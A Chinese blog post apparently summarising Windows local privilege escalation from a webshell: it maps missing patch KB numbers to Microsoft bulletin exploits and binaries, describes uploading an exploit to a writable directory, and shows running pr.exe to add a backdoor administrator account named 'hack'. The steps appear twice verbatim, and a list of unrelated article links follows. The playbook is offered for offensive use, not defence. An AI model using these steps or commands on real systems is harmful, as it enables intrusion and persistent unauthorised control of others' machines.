Windows溢出提权小结
2015-09-22 14:05
239 查看
1、 查看系统打补丁情况:systeminfo
2、 查看KB-EXP表:
KB2360937 MS10-084
KB2478960 MS11-014
KB2507938 MS11-056
KB2566454 MS11-062
KB2646524 MS12-003
KB2645640 MS12-009
KB2641653 MS12-018
KB952004 MS09-012 Pr.exe
KB956572 MS09-012 巴西烤肉
KB971657 MS09-041
KB2620712 MS11-097
KB2393802 MS11-011 ms11011.exe
KB942831 MS08-005
KB2503665 MS11-046 ms11046.exe
KB2592799 MS11-080 ms11080.exe
这个表以后会不断更新!
3、 webshell中查找可读可写可执行的目录,然后上传我们的EXP
如果不能上传,则通过下载EXP解决
4、 webshell中执行我们的EXP
比如:
pr.exe “whoami”
执行结果:
administrator
pr.exe “net user hack 1234 /add & net localgroup administrators hack /add”
其他的EXP一个道理~
EXP可以参考一下暗月的~
2、 查看KB-EXP表:
KB2360937 MS10-084
KB2478960 MS11-014
KB2507938 MS11-056
KB2566454 MS11-062
KB2646524 MS12-003
KB2645640 MS12-009
KB2641653 MS12-018
KB952004 MS09-012 Pr.exe
KB956572 MS09-012 巴西烤肉
KB971657 MS09-041
KB2620712 MS11-097
KB2393802 MS11-011 ms11011.exe
KB942831 MS08-005
KB2503665 MS11-046 ms11046.exe
KB2592799 MS11-080 ms11080.exe
这个表以后会不断更新!
3、 webshell中查找可读可写可执行的目录,然后上传我们的EXP
如果不能上传,则通过下载EXP解决
4、 webshell中执行我们的EXP
比如:
pr.exe “whoami”
执行结果:
administrator
pr.exe “net user hack 1234 /add & net localgroup administrators hack /add”
其他的EXP一个道理~
EXP可以参考一下暗月的~
相关文章推荐
- python执行系统命令的几种方法
- 《Autodesk Revit二次开发基础教程》书籍终于上架了
- 人脸检测
- 实现简单易用的图片轮播器
- 内核与内核模块:depmod,lsmod,modinfo,insmod,rmmod,mdprobe
- 左右Map
- 代理模式及其在spring与struts2中的体现
- getcwd
- Linux 的启动流程
- Win7系统删除文件提示“文件名过长”怎么办?原因分析以及解决方法
- *****socket同步异步阻塞非阻塞区别
- PHP抓取网站图片脚本
- Unity3D研究院之与Android相互传递消息(十九)
- PHP的一个加密算法
- 数据库时间小技巧 - 取数据库中时间格式是12小时制的时间,如何显示成24小时制
- Debug系列:VC++程序Release版崩溃的解决办法
- ContentProvider的详细用法
- Ubuntu sublime 下载安装
- 一款非常不错的可拖曳空间
- unity3dGUI教程